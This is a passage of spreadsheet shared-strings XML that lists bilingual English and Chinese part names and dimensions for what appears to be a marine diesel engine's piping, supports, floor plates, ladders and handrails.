    <t>排气阀驱动油透气管</t>
  </si>
  <si>
    <t>Attachment boss for steel pipe G1/2×25</t>
  </si>
  <si>
    <t>Attachment boss for steel pipe G1/8x15L</t>
  </si>
  <si>
    <t>Attachment boss for steel pipe G3/8×20</t>
  </si>
  <si>
    <t>Bevel gear(big)</t>
  </si>
  <si>
    <t>锥齿轮</t>
  </si>
  <si>
    <t>Bevel gear(small)</t>
  </si>
  <si>
    <t>Bite type fitt. LLM-UR-3/8×3/8</t>
  </si>
  <si>
    <t>Bite type fitting LLM-UR-1/2x1/2</t>
  </si>
  <si>
    <t>Bite type pipe fitt LLM T-6</t>
  </si>
  <si>
    <t>Boss A-type G1/8×15L</t>
  </si>
  <si>
    <t>Boss A-type M20×1.5×20L</t>
  </si>
  <si>
    <t>Boss G1/2×25L</t>
  </si>
  <si>
    <t>Boss Type-A M20×1.5×20L</t>
  </si>
  <si>
    <t>Boss Type-B M24×2×55L</t>
  </si>
  <si>
    <t>控制系统连接管</t>
  </si>
  <si>
    <t>起动空气控制阀连接管</t>
  </si>
  <si>
    <t>Connecting pipe starting air con.valve（1/2～2/2）</t>
  </si>
  <si>
    <t>Control air pipe of starting air valve（1/2～2/2）</t>
  </si>
  <si>
    <t>起动空气控制阀管</t>
  </si>
  <si>
    <t>Control air pipe of starting con.valve（1/2～2/2）</t>
  </si>
  <si>
    <t>Copper gasket　17×21×ｔ1</t>
  </si>
  <si>
    <t>Copper gasket 17x21xt1</t>
  </si>
  <si>
    <t>Copper gasket　18.5×22×ｔ1</t>
  </si>
  <si>
    <t>Copper gasket　20.5×26×ｔ1</t>
  </si>
  <si>
    <t>Copper gasket 21.5×26×1</t>
  </si>
  <si>
    <t>Copper gasket　21.5×26×ｔ1</t>
  </si>
  <si>
    <t>Copper gasket 25x34xt1</t>
  </si>
  <si>
    <t>Copper gasket 9.5×14×0.5</t>
  </si>
  <si>
    <t>盘头螺钉</t>
  </si>
  <si>
    <t>Drain branch pipe of exh. valve driving oil （1/2～2/2）</t>
  </si>
  <si>
    <t>排气阀驱动油泄放管</t>
  </si>
  <si>
    <t>Drain main pipe of exh. valve or driving oil （1/2～2/2）</t>
  </si>
  <si>
    <t>泄放分离罐装配图</t>
  </si>
  <si>
    <t>方形直角接头</t>
  </si>
  <si>
    <t>Flange 5K-10A</t>
  </si>
  <si>
    <t>Flange 5K-50A</t>
  </si>
  <si>
    <t>Flange　5K-65A</t>
  </si>
  <si>
    <t>Full-face gasket　5K-25</t>
  </si>
  <si>
    <t>Full-face gasket 5K-32</t>
  </si>
  <si>
    <t>Full-face gasket 5K-50A</t>
  </si>
  <si>
    <t>Full-face gaskets　10K-40</t>
  </si>
  <si>
    <t>Full-face gaskets　5K-10A</t>
  </si>
  <si>
    <t>Full-face gaskets　5K-25A</t>
  </si>
  <si>
    <t>Full-face gaskets　5K-40</t>
  </si>
  <si>
    <t>Full-face gaskets　5K-40A</t>
  </si>
  <si>
    <t>Full-face gaskets　5K-50</t>
  </si>
  <si>
    <t>Heating trace pipe of drain branch pipe of fuel valve</t>
  </si>
  <si>
    <t>燃油泄放伴热管</t>
  </si>
  <si>
    <t>Heating trace pipe of drain main pipe of f.o.pump</t>
  </si>
  <si>
    <t>燃油泵泄放伴热管</t>
  </si>
  <si>
    <t>Heating trace pipe of drain main pipe of fuel valve</t>
  </si>
  <si>
    <t>喷油器泄放伴热管</t>
  </si>
  <si>
    <t>Heating trace pipe of drain main pipe of protective pipe</t>
  </si>
  <si>
    <t>护管泄放伴热管</t>
  </si>
  <si>
    <t>Heating trace pipe of free end of fuel oil damper</t>
  </si>
  <si>
    <t>首端燃油减震器伴热管</t>
  </si>
  <si>
    <t>Heating trace pipe of in.and out.main pipe of F.O.</t>
  </si>
  <si>
    <t>燃油伴热管</t>
  </si>
  <si>
    <t>Heating trace pipe of in.branch pipe of F.O.</t>
  </si>
  <si>
    <t>Heating trace pipe of out.branch pipe of F.O.</t>
  </si>
  <si>
    <t>六角螺栓</t>
  </si>
  <si>
    <t>Hexagon head bolt　M10×35</t>
  </si>
  <si>
    <t>Hexagon head bolt　M10×40</t>
  </si>
  <si>
    <t>Hexagon head bolt　M12×20</t>
  </si>
  <si>
    <t>Hexagon　nut M10</t>
  </si>
  <si>
    <t>Hydraulic pipe for exhaust valve (1/2～2/2)</t>
  </si>
  <si>
    <t>Inlet branch pipe of exh. valve driving oil</t>
  </si>
  <si>
    <t>排气阀驱动油管</t>
  </si>
  <si>
    <t>Inlet pipe of　T/C lub..oil （MET37MB)</t>
  </si>
  <si>
    <t>增压器滑油进油管</t>
  </si>
  <si>
    <t>Interval joint</t>
  </si>
  <si>
    <t>转接头</t>
  </si>
  <si>
    <t>L40×40×5-135L</t>
  </si>
  <si>
    <t>L型钢</t>
  </si>
  <si>
    <t>L40×40×5-162L</t>
  </si>
  <si>
    <t>L40×40×5-167.7L</t>
  </si>
  <si>
    <t>L40×40×5-95L</t>
  </si>
  <si>
    <t>L50×50×6×189</t>
  </si>
  <si>
    <t>L50×50×6-100</t>
  </si>
  <si>
    <t>L50×50×6-145</t>
  </si>
  <si>
    <t>L50×50×6-172</t>
  </si>
  <si>
    <t>Lagging</t>
  </si>
  <si>
    <t>Look type needle valves 20K-10A</t>
  </si>
  <si>
    <t>Lub. supply pipe of cylinder lub. oil system</t>
  </si>
  <si>
    <t>汽缸油进油管</t>
  </si>
  <si>
    <t>Lubricating branch pipe of fuel oil pump (1/2～2/2)</t>
  </si>
  <si>
    <t>燃油泵滑油管</t>
  </si>
  <si>
    <t>Lubricating main pipe of fuel oil pump (1/2～2/2)</t>
  </si>
  <si>
    <t>Material specification for hydraulic pipe</t>
  </si>
  <si>
    <t>液压管材料规范</t>
  </si>
  <si>
    <t>船级社材料规范</t>
  </si>
  <si>
    <t>One way rectangular joint assembly</t>
  </si>
  <si>
    <t>Orifice (25A)</t>
  </si>
  <si>
    <t>O-ring P71</t>
  </si>
  <si>
    <t>Outlet pipe of T/C lube oil （MET37MB)</t>
  </si>
  <si>
    <t>Pipe 10A×Sch40×43.3</t>
  </si>
  <si>
    <t>Pipe 10A×Sch40×438.1</t>
  </si>
  <si>
    <t>Pipe 10AxSch40x1152.1</t>
  </si>
  <si>
    <t>Pipe 10AxSch40x1371.3</t>
  </si>
  <si>
    <t>Pipe 10AxSch40x292.5</t>
  </si>
  <si>
    <t>Pipe 10AxSch40x3246</t>
  </si>
  <si>
    <t>Pipe 10AxSch40x580.4</t>
  </si>
  <si>
    <t>Pipe 25A X Sch80 X 113L</t>
  </si>
  <si>
    <t>Pipe 25A X Sch80 X 63L</t>
  </si>
  <si>
    <t>Pipe 32A×1123.6</t>
  </si>
  <si>
    <t>Pipe 40A×1150.2L</t>
  </si>
  <si>
    <t>Pipe 40A×1159.1</t>
  </si>
  <si>
    <t>Pipe 40A×1342.3L</t>
  </si>
  <si>
    <t>Pipe 40A×36.4</t>
  </si>
  <si>
    <t>Pipe 40A×424.2</t>
  </si>
  <si>
    <t>Pipe 40A×72.2L</t>
  </si>
  <si>
    <t>Pipe 40A×910.4</t>
  </si>
  <si>
    <t>Pipe 50A X Sch80 X 121L</t>
  </si>
  <si>
    <t>Pipe 6A×Sch40×283.5</t>
  </si>
  <si>
    <t>Pipe arrangement inlet connecting pipe of exh. valve driving oil</t>
  </si>
  <si>
    <t>调速器润滑油管</t>
  </si>
  <si>
    <t>增压器冷却空气管</t>
  </si>
  <si>
    <t>Pipe end welding boss M24x2x40L</t>
  </si>
  <si>
    <t>Pipe support　</t>
  </si>
  <si>
    <t>Pipe support Atype 10Ax1</t>
  </si>
  <si>
    <t>Pipe support Btype 10Ax1</t>
  </si>
  <si>
    <t>Pipe support B-type φ15×1</t>
  </si>
  <si>
    <t>Pipe support　Type：B　22×1</t>
  </si>
  <si>
    <t>Pipe support　Type：B　22×2</t>
  </si>
  <si>
    <t>Pipe support　Type：B　22×3</t>
  </si>
  <si>
    <t>Pipe support　Type：B　22×4</t>
  </si>
  <si>
    <t>Pipe φ10×ｔ2×1112.1L</t>
  </si>
  <si>
    <t>Pipe φ10×ｔ2×1491.2L</t>
  </si>
  <si>
    <t>Pipe φ10×ｔ2×200L</t>
  </si>
  <si>
    <t>Pipe φ10×ｔ2×375.4L</t>
  </si>
  <si>
    <t>Pipe φ10×ｔ2×542.2L</t>
  </si>
  <si>
    <t>Pipe φ10×ｔ2×607.4L</t>
  </si>
  <si>
    <t>Pipe φ10×ｔ2×612.2L</t>
  </si>
  <si>
    <t>Pipe φ10×ｔ2×714.1L</t>
  </si>
  <si>
    <t>Pipe φ15×ｔ2×109L</t>
  </si>
  <si>
    <t>Pipe φ15×ｔ2×1131.7L</t>
  </si>
  <si>
    <t>Pipe φ15×ｔ2×2125.7L</t>
  </si>
  <si>
    <t>Pipe φ15×ｔ2×341.4L</t>
  </si>
  <si>
    <t>Pipe φ15×ｔ2×342.4L</t>
  </si>
  <si>
    <t>Pipe φ15×ｔ2×462.7L</t>
  </si>
  <si>
    <t>Pipe φ15×ｔ2×481.8L</t>
  </si>
  <si>
    <t>Pipe φ15×ｔ2×50L</t>
  </si>
  <si>
    <t>Pipe φ15×ｔ2×515.9L</t>
  </si>
  <si>
    <t>Pipe φ15×ｔ2×519.8L</t>
  </si>
  <si>
    <t>Pipe φ15×ｔ2×613.3L</t>
  </si>
  <si>
    <t>Pipe φ15×ｔ2×621.9L</t>
  </si>
  <si>
    <t>Pipe φ15×ｔ2×781.2L</t>
  </si>
  <si>
    <t>Pipe φ15×ｔ2×867L</t>
  </si>
  <si>
    <t>Pipe φ15×ｔ2×879.9L</t>
  </si>
  <si>
    <t>Pipe φ15×ｔ2×978.1L</t>
  </si>
  <si>
    <t>Pipe φ6×ｔ1×113.4L</t>
  </si>
  <si>
    <t>Pipe φ6×ｔ1×141.1L</t>
  </si>
  <si>
    <t>Pipe φ6×ｔ1×300L</t>
  </si>
  <si>
    <t>Pipe φ6×ｔ1×453.6L</t>
  </si>
  <si>
    <t>Pipe φ6×ｔ1×509.7L</t>
  </si>
  <si>
    <t>Pipe φ6×ｔ1×544.1L</t>
  </si>
  <si>
    <t>Pipe φ6×ｔ1×609.4L</t>
  </si>
  <si>
    <t>Pipe φ6×ｔ1×668.7L</t>
  </si>
  <si>
    <t>Pipe φ6×ｔ1×725.1L</t>
  </si>
  <si>
    <t>Pipe φ6×ｔ1×760.8L</t>
  </si>
  <si>
    <t>Pipe φ6×ｔ1×782.4L</t>
  </si>
  <si>
    <t>Pipe φ6×ｔ1×790.8L</t>
  </si>
  <si>
    <t>Pipe φ6×ｔ1×792.9L</t>
  </si>
  <si>
    <t>Pipe φ6×ｔ1×804.5L</t>
  </si>
  <si>
    <t>Pipe φ6×ｔ1×818.1L</t>
  </si>
  <si>
    <t>Pipe φ6×ｔ1×848.3L</t>
  </si>
  <si>
    <t>Pipe φ6×ｔ1×894.9L</t>
  </si>
  <si>
    <t>Pipe φ6×ｔ1×929.4L</t>
  </si>
  <si>
    <t>Pipe φ6×ｔ1×95.5L</t>
  </si>
  <si>
    <t>Pipe φ6×ｔ1×975.8L</t>
  </si>
  <si>
    <t>Pipe φ6×ｔ1×abt.1957L</t>
  </si>
  <si>
    <t>Pipe φ6×ｔ1×abt.1987L</t>
  </si>
  <si>
    <t>Plate 100×100×ｔ9</t>
  </si>
  <si>
    <t>Plate 100×50×ｔ9</t>
  </si>
  <si>
    <t>Plate 100×65×t9</t>
  </si>
  <si>
    <t>Plate　15A×1</t>
  </si>
  <si>
    <t>Plate　15A×2</t>
  </si>
  <si>
    <t>Plate　15A×3</t>
  </si>
  <si>
    <t>Plate　15A×4</t>
  </si>
  <si>
    <t>Plate　50×ｔ9×90</t>
  </si>
  <si>
    <t>Plate ｔ19x50x80</t>
  </si>
  <si>
    <t>Plate ｔ9×50×80</t>
  </si>
  <si>
    <t>Plug G1/2</t>
  </si>
  <si>
    <t>Protective pipe of high press. pipe of exh. valve driving oil （1/2～2/2）</t>
  </si>
  <si>
    <t>排气阀驱动油护管</t>
  </si>
  <si>
    <t>减压阀组</t>
  </si>
  <si>
    <t>Round bar D12</t>
  </si>
  <si>
    <t>棒材</t>
  </si>
  <si>
    <t>Special flange 10K-50-40A</t>
  </si>
  <si>
    <t>特种法兰</t>
  </si>
  <si>
    <t>Special flange 5K-25-32A</t>
  </si>
  <si>
    <t>特种垫片</t>
  </si>
  <si>
    <t>Special pipe support</t>
  </si>
  <si>
    <t>特种管支架</t>
  </si>
  <si>
    <t xml:space="preserve">Special U bolt </t>
  </si>
  <si>
    <t>特种U型螺栓</t>
  </si>
  <si>
    <t>Square Flange 5K-25A</t>
  </si>
  <si>
    <t>Stainless ball D10</t>
  </si>
  <si>
    <t>不锈钢球</t>
  </si>
  <si>
    <t>Starting air drain separator flange assembly</t>
  </si>
  <si>
    <t>起动空气分离器装配</t>
  </si>
  <si>
    <t>Starting air drain separator hanlde assembly</t>
  </si>
  <si>
    <t>Starting air drain separator pipe assembly</t>
  </si>
  <si>
    <t>Steel pipe 40K-15 One way rectangular joint assembly</t>
  </si>
  <si>
    <t>方形接头</t>
  </si>
  <si>
    <t>U bolt 25A　</t>
  </si>
  <si>
    <t>U bolt 40A</t>
  </si>
  <si>
    <t>U bolt 50A　</t>
  </si>
  <si>
    <t>U-bolt 50</t>
  </si>
  <si>
    <t>Wire　φ1.2×400</t>
  </si>
  <si>
    <t>H125X125X6.5X9-757L</t>
  </si>
  <si>
    <t>H125X125X6.5X9-785L</t>
  </si>
  <si>
    <t>H125X125X6.5X9-812.9L</t>
  </si>
  <si>
    <t>H125X125X6.5X9-786.7L</t>
  </si>
  <si>
    <t>H125X125X6.5X9-458.5L</t>
  </si>
  <si>
    <t>H125X125X6.5X9-893.5L</t>
  </si>
  <si>
    <t>H125X125X6.5X9-513.5L</t>
  </si>
  <si>
    <t>H125X125X6.5X9-743.5L</t>
  </si>
  <si>
    <t>H125X125X6.5X9-558.5L</t>
  </si>
  <si>
    <t>L125X75X10-300L</t>
  </si>
  <si>
    <t>L125X75X10-707.1L</t>
  </si>
  <si>
    <t>L125X75X10-3425L</t>
  </si>
  <si>
    <t>L125X75X10-436L</t>
  </si>
  <si>
    <t>Plate 115x125xt16</t>
  </si>
  <si>
    <t>Plate 175x145xt19</t>
  </si>
  <si>
    <t>Plate 125x50xt19</t>
  </si>
  <si>
    <t>10.9-Bolts M20×45</t>
  </si>
  <si>
    <t>Bolt M16×35</t>
  </si>
  <si>
    <t>Foot plate (Exhaust side)</t>
  </si>
  <si>
    <t>Floor plate t4.5x1224x860</t>
  </si>
  <si>
    <t>Plate t6x65x1224</t>
  </si>
  <si>
    <t>Floor Plate t4.5x1305.5x860</t>
  </si>
  <si>
    <t>Plate t6x65x1305.5</t>
  </si>
  <si>
    <t>Foot plate (Driving end side)</t>
  </si>
  <si>
    <t>Floor Plate t4.5x852x465</t>
  </si>
  <si>
    <t>Plate t6x65x465</t>
  </si>
  <si>
    <t>Foot plate (Camshaft side)</t>
  </si>
  <si>
    <t>Floor plate t4.5x819x1004</t>
  </si>
  <si>
    <t>Plate 65xt6x1004</t>
  </si>
  <si>
    <t>Floor plate t4.5x463x819</t>
  </si>
  <si>
    <t>Plate 65xt6x463</t>
  </si>
  <si>
    <t>Floor plate t4.5x1224x819</t>
  </si>
  <si>
    <t>Plate 65xt6x1224</t>
  </si>
  <si>
    <t>Floor plate t4.5x709x1004</t>
  </si>
  <si>
    <t>Floor plate t4.5x463x890</t>
  </si>
  <si>
    <t>Plate 65xt6x708.7</t>
  </si>
  <si>
    <t>L65X65X6-330L</t>
  </si>
  <si>
    <t>Floor plate t4.5x1224x890</t>
  </si>
  <si>
    <t>Plate 1379.5xt6x65</t>
  </si>
  <si>
    <t>Plate 50xt6x482</t>
  </si>
  <si>
    <t>Plate 50xt6x375</t>
  </si>
  <si>
    <t>Foot plate (Exhaust side) t4.5x1408x1235</t>
  </si>
  <si>
    <t>Plate t6x65x930.8</t>
  </si>
  <si>
    <t>Plate t6x2425x65</t>
  </si>
  <si>
    <t>Plate 1157.5x50t6</t>
  </si>
  <si>
    <t>Plate 193.5x50xt6</t>
  </si>
  <si>
    <t>Plate 297.5x50xt6</t>
  </si>
  <si>
    <t>Foot plate (Exhaust side) t4.5x1224x800</t>
  </si>
  <si>
    <t>Plate t6x65x2504</t>
  </si>
  <si>
    <t>L65X65X6-1034L</t>
  </si>
  <si>
    <t>Plate 770x50xt6</t>
  </si>
  <si>
    <t>Plate 240x50xt6</t>
  </si>
  <si>
    <t>Plate 260x50xt6</t>
  </si>
  <si>
    <t>Foot plate (Exhaust side) t4.5x1305.5x800</t>
  </si>
  <si>
    <t>Plate t6x65x2599.5</t>
  </si>
  <si>
    <t>L65X65X6-1115L</t>
  </si>
  <si>
    <t>Plate 407x50xt6</t>
  </si>
  <si>
    <t>Plate 474x50xt6</t>
  </si>
  <si>
    <t>Plate 115x40xt12</t>
  </si>
  <si>
    <t>Floor plate t4.5x1198x860</t>
  </si>
  <si>
    <t>Plate t6x65x1648</t>
  </si>
  <si>
    <t>Plate t6x65x1198</t>
  </si>
  <si>
    <t>Floor Plate t4.5x1408x425</t>
  </si>
  <si>
    <t>Plate t6x65x1408</t>
  </si>
  <si>
    <t>Floor plate t4.5x852x819</t>
  </si>
  <si>
    <t>Plate 1359.5x65xt6</t>
  </si>
  <si>
    <t>Floor plate t4.5x852x900</t>
  </si>
  <si>
    <t>Plate t6x65x710</t>
  </si>
  <si>
    <t>Plate t6x65x900</t>
  </si>
  <si>
    <t>Floor plate t4.5x804x520</t>
  </si>
  <si>
    <t>Plate t6x65x520</t>
  </si>
  <si>
    <t>Floor Plate t4.5x804x750</t>
  </si>
  <si>
    <t>Plate t6x65x750</t>
  </si>
  <si>
    <t>Foot plate  (Driving end side)</t>
  </si>
  <si>
    <t>Floor Plate t4.5x937x990</t>
  </si>
  <si>
    <t>Plate t6x65x269</t>
  </si>
  <si>
    <t>Plate 1626.6x65xt6</t>
  </si>
  <si>
    <t>Floor plate t4.5x1044x819</t>
  </si>
  <si>
    <t>Plate 1492.9x65xt6</t>
  </si>
  <si>
    <t>Floor plate t4.5x1044x1010</t>
  </si>
  <si>
    <t>Plate t6x910x65</t>
  </si>
  <si>
    <t>Plate t6x65x1010</t>
  </si>
  <si>
    <t>Floor plate t4.5x689x815</t>
  </si>
  <si>
    <t>Plate t6x532.5x65</t>
  </si>
  <si>
    <t>Plate t6x377x65</t>
  </si>
  <si>
    <t>Plate t6x65x815</t>
  </si>
  <si>
    <t>Floor plate t4.5x898x647</t>
  </si>
  <si>
    <t>Plate t6x1451x65</t>
  </si>
  <si>
    <t>Floor Plate t4.5x65x647</t>
  </si>
  <si>
    <t>Floor Plate t4.5x962.5x1153</t>
  </si>
  <si>
    <t>Plate t6x65x234</t>
  </si>
  <si>
    <t>Plate 1815.1x65xt6</t>
  </si>
  <si>
    <t>Floor Plate t4.5x375x450</t>
  </si>
  <si>
    <t>Grip　φ6x253.6L</t>
  </si>
  <si>
    <t>Plate t6x20x20</t>
  </si>
  <si>
    <t>Plate t6x50x180</t>
  </si>
  <si>
    <t>Floor Plate t4.5x420x420</t>
  </si>
  <si>
    <t>Grip　φ 6x253.6L</t>
  </si>
  <si>
    <t>Countersink head screw</t>
  </si>
  <si>
    <t>Pipe 20Ax1527.2L</t>
  </si>
  <si>
    <t>Pipe 20Ax2032.2L</t>
  </si>
  <si>
    <t>Pipe 20Ax1907.9L</t>
  </si>
  <si>
    <t>Pipe 20Ax1716.7L</t>
  </si>
  <si>
    <t>Round bar 　φ16x1522.2L</t>
  </si>
  <si>
    <t>Round bar　φ16x2072.2L</t>
  </si>
  <si>
    <t>Round bar　φ16x1897.2L</t>
  </si>
  <si>
    <t>Round bar　φ16x1649L</t>
  </si>
  <si>
    <t>Round bar　φ16x1527.2L</t>
  </si>
  <si>
    <t>Round bar　φ16x2032.2L</t>
  </si>
  <si>
    <t>Round bar　φ16x1907.9L</t>
  </si>
  <si>
    <t>Round bar　φ16x1716.7L</t>
  </si>
  <si>
    <t>Pipe 20Ax1660L</t>
  </si>
  <si>
    <t>Pipe 20Ax2270L</t>
  </si>
  <si>
    <t>Pipe 20Ax1900L</t>
  </si>
  <si>
    <t>Pipe 20Ax1700L</t>
  </si>
  <si>
    <t>Round bar　φ16x1660L</t>
  </si>
  <si>
    <t>Round bar　φ16x2270L</t>
  </si>
  <si>
    <t>Round bar　φ16x1900L</t>
  </si>
  <si>
    <t>Round bar　φ16x1700L</t>
  </si>
  <si>
    <t>Pipe 20Ax1522.2L</t>
  </si>
  <si>
    <t>Pipe 20Ax2072.2L</t>
  </si>
  <si>
    <t>Pipe 20Ax1897.2L</t>
  </si>
  <si>
    <t>Pipe 20Ax1649L</t>
  </si>
  <si>
    <t>Handrail assembly</t>
  </si>
  <si>
    <t>Square pipe cap</t>
  </si>
  <si>
    <t>Joint pipe 25A</t>
  </si>
  <si>
    <t>Pipe 25Ax80L</t>
  </si>
  <si>
    <t>Joint pipe 15A</t>
  </si>
  <si>
    <t>Pipe 15Ax100L</t>
  </si>
  <si>
    <t>Bolt M12×80</t>
  </si>
  <si>
    <t>Bolt M12×85</t>
  </si>
  <si>
    <t>Bolt M12×95</t>
  </si>
  <si>
    <t>L50X50X6-3580L</t>
  </si>
  <si>
    <t>H100X50X5X7-1010L</t>
  </si>
  <si>
    <t>L65X65X6-340L</t>
  </si>
  <si>
    <t>L50X50X6-220L</t>
  </si>
  <si>
    <t>L50X50X6-340L</t>
  </si>
  <si>
    <t>Plate 120x150xt16</t>
  </si>
  <si>
    <t>Plate 90x100xt6</t>
  </si>
  <si>
    <t>L50X50X6-353L</t>
  </si>
  <si>
    <t>10.9-Bolts M16×35</t>
  </si>
  <si>
    <t>L125X75X10-2604L</t>
  </si>
  <si>
    <t>L125X75X10-2527.5L</t>
  </si>
  <si>
    <t>H125X125X6.5X9-1097.2L</t>
  </si>
  <si>
    <t>H125X125X6.5X9-1307.2L</t>
  </si>
  <si>
    <t>H125X125X6.5X9-1217.5L</t>
  </si>
  <si>
    <t>H125X125X6.5X9-844L</t>
  </si>
  <si>
    <t>H125X125X6.5X9-1299L</t>
  </si>
  <si>
    <t>Plate 115x150xt19</t>
  </si>
  <si>
    <t>Plate 115x150xt16</t>
  </si>
  <si>
    <t>Plate 107x59xt12</t>
  </si>
  <si>
    <t>Plate 93x65xt19</t>
  </si>
  <si>
    <t>Plate 175x150xt16</t>
  </si>
  <si>
    <t>Plate 70x68xt9</t>
  </si>
  <si>
    <t>10.9-Bolts M20×40</t>
  </si>
  <si>
    <t>Keep out area painting outline</t>
  </si>
  <si>
    <t>H200X100X5.5X8-1503L</t>
  </si>
  <si>
    <t>Plate 252x125xt16</t>
  </si>
  <si>
    <t>Plate 188x125xt19</t>
  </si>
  <si>
    <t>Plate 184x112.3xt19</t>
  </si>
  <si>
    <t>Plate 100x60xt19</t>
  </si>
  <si>
    <t>Plate 190x75xt16</t>
  </si>
  <si>
    <t>Plate 184x47.3xt9</t>
  </si>
  <si>
    <t>Plate 40x52xt22</t>
  </si>
  <si>
    <t>H200X100X5.5X8-1600L</t>
  </si>
  <si>
    <t>H125X125X6.5X9-606.5L</t>
  </si>
  <si>
    <t>H125X125X6.5X9-524.2L</t>
  </si>
  <si>
    <t>C125X65X6X8-3502L</t>
  </si>
  <si>
    <t>L65X65X6-350L</t>
  </si>
  <si>
    <t>L65X65X6-606.5L</t>
  </si>
  <si>
    <t>L65X65X6-543.2L</t>
  </si>
  <si>
    <t>Plate 190x95xt19</t>
  </si>
  <si>
    <t>Plate 188x125xt16</t>
  </si>
  <si>
    <t>Plate 90x130xt16</t>
  </si>
  <si>
    <t>Plate 80x80xt16</t>
  </si>
  <si>
    <t>H200X100X5.5X8-1654L</t>
  </si>
  <si>
    <t>Plate 290x150xt30</t>
  </si>
  <si>
    <t>Plate 60x188xt19</t>
  </si>
  <si>
    <t>Plate 134x68xt9</t>
  </si>
  <si>
    <t>Plate 150x47.3xt9</t>
  </si>
  <si>
    <t>Plate 77x80xt19</t>
  </si>
  <si>
    <t>Plate 77x28.2xt9</t>
  </si>
  <si>
    <t>H200X100X5.5X8-1419L</t>
  </si>
  <si>
    <t>H125X125X6.5X9-375.2L</t>
  </si>
  <si>
    <t>H125X125X6.5X9-916.2L</t>
  </si>
  <si>
    <t>C125X65X6X8-1300L</t>
  </si>
  <si>
    <t>Plate 115x75xt16</t>
  </si>
  <si>
    <t>H125X125X6.5X9-949L</t>
  </si>
  <si>
    <t>H125X125X6.5X9-921L</t>
  </si>
  <si>
    <t>H125X125X6.5X9-891L</t>
  </si>
  <si>
    <t>H125X125X6.5X9-838.3L</t>
  </si>
  <si>
    <t>H125X125X6.5X9-645.1L</t>
  </si>
  <si>
    <t>H125X125X6.5X9-1003.5L</t>
  </si>
  <si>
    <t>H125X125X6.5X9-808.5L</t>
  </si>
  <si>
    <t>H125X125X6.5X9-640.5L</t>
  </si>
  <si>
    <t>H125X125X6.5X9-721.5L</t>
  </si>
  <si>
    <t>L125X75X10-343L</t>
  </si>
  <si>
    <t>L125X75X10-848.5L</t>
  </si>
  <si>
    <t>L125X75X10-3325L</t>
  </si>
  <si>
    <t>L125X75X10-461.5L</t>
  </si>
  <si>
    <t>Plate 165x145xt19</t>
  </si>
  <si>
    <t>Plate 226x175xt22</t>
  </si>
  <si>
    <t>Plate 184x75xt9</t>
  </si>
  <si>
    <t>Plate 134x50xt9</t>
  </si>
  <si>
    <t>Plate 115x60xt16</t>
  </si>
  <si>
    <t>Plate 130x65xt16</t>
  </si>
  <si>
    <t>Plate 130x90xt16</t>
  </si>
  <si>
    <t>Control support arrangement (Free end side)</t>
  </si>
  <si>
    <t>Control support (Free end side)</t>
  </si>
  <si>
    <t>C100X50X5X7.5-1203.5L</t>
  </si>
  <si>
    <t>L75X75X6-682L</t>
  </si>
  <si>
    <t>L75X75X6-890L</t>
  </si>
  <si>
    <t>L75X75X6-190L</t>
  </si>
  <si>
    <t>L75X75X6-284L</t>
  </si>
  <si>
    <t>L75X75X6-164L</t>
  </si>
  <si>
    <t>L50X50X6-350L</t>
  </si>
  <si>
    <t>L50X50X6-800L</t>
  </si>
  <si>
    <t>L50X50X6-521L</t>
  </si>
  <si>
    <t>L50X50X6-170L</t>
  </si>
  <si>
    <t>Plate190X70Xt12</t>
  </si>
  <si>
    <t>Plate125X85Xt12</t>
  </si>
  <si>
    <t>Plate125X65Xt19</t>
  </si>
  <si>
    <t>Plate120X50Xt9</t>
  </si>
  <si>
    <t>Plate125X50Xt19</t>
  </si>
  <si>
    <t>Ladder (Free end side)</t>
  </si>
  <si>
    <t>Plate614.5X50Xt9</t>
  </si>
  <si>
    <t>L50X50X6-75L</t>
  </si>
  <si>
    <t>Plate100X38Xt9</t>
  </si>
  <si>
    <t>Square bar16X484</t>
  </si>
  <si>
    <t>BoltM12X30</t>
  </si>
  <si>
    <t>Hexagon nutM12</t>
  </si>
  <si>
    <t>Bolt M16X25</t>
  </si>
  <si>
    <t>Control footplate support arrangement (Free end side)</t>
  </si>
  <si>
    <t>Footplate (Free end side)</t>
  </si>
  <si>
    <t>Floor plate t4.5×1100.5×1260</t>
  </si>
  <si>
    <t>Plate t6×65×4697</t>
  </si>
  <si>
    <t>Countersink head screw M8×16</t>
  </si>
  <si>
    <t>Control handrail support arrangement</t>
  </si>
  <si>
    <t>Square pipe 30×50×1295</t>
  </si>
  <si>
    <t>Flame retarded grommets 28A</t>
  </si>
  <si>
    <t>Flame retarded grommets 18A</t>
  </si>
  <si>
    <t>Pipe 20A</t>
  </si>
  <si>
    <t>Round bar_x0001_φ16</t>
  </si>
  <si>
    <t>Pipe 25A×80L</t>
  </si>
  <si>
    <t>Pipe 15A×100</t>
  </si>
  <si>
    <t>Lower ladder arrangement (Exhaust side)</t>
  </si>
  <si>
    <t>Ladder (Exhaust side)</t>
  </si>
  <si>
    <t>Pipe 20Ax2945.4mm</t>
  </si>
  <si>
    <t>Pipe 15Ax2156.2mm</t>
  </si>
  <si>
    <t>Pipe 15Ax1356.4mm</t>
  </si>
  <si>
    <t>Pipe 15Ax594mm</t>
  </si>
  <si>
    <t>Pipe 15Ax571.5mm</t>
  </si>
  <si>
    <t>Pipe 15Ax102mm</t>
  </si>
  <si>
    <t>Pipe 15Ax70.3mm</t>
  </si>
  <si>
    <t>Pipe 20Ax187.1mm</t>
  </si>
  <si>
    <t>Pipe 100Ax40mm</t>
  </si>
  <si>
    <t>Square bar 14×455</t>
  </si>
  <si>
    <t>Square bar 14×427.8</t>
  </si>
  <si>
    <t>Floorplate 522.4×427.8×t4.5</t>
  </si>
  <si>
    <t>Plate 104×40×t6</t>
  </si>
  <si>
    <t>Plate 69.4×105×t6</t>
  </si>
  <si>
    <t>Plate 110×45×t6</t>
  </si>
  <si>
    <t>Plate 75×75×t6</t>
  </si>
  <si>
    <t>Plate 165×124.9×t6</t>
  </si>
  <si>
    <t>Lower support (Camshaft side)</t>
  </si>
  <si>
    <t>H100X100X6X8-665L</t>
  </si>
  <si>
    <t>Plate　90×100×t19</t>
  </si>
  <si>
    <t>Plate　84×47×t6</t>
  </si>
  <si>
    <t>H100X100X6X8-528L</t>
  </si>
  <si>
    <t>Plate　90×100×t12</t>
  </si>
  <si>
    <t>Plate　68×70×t9</t>
  </si>
  <si>
    <t>Plate　100×50×t19</t>
  </si>
  <si>
    <t>Plate　90×50×t12</t>
  </si>
  <si>
    <t>H100X100X6X8-606L</t>
  </si>
  <si>
    <t>H100X100X6X8-662L</t>
  </si>
  <si>
    <t>C100X50X5X7.5-246.5L</t>
  </si>
  <si>
    <t>C75X40X5X7-619L</t>
  </si>
  <si>
    <t>C75X40X5X7-206.5L</t>
  </si>
  <si>
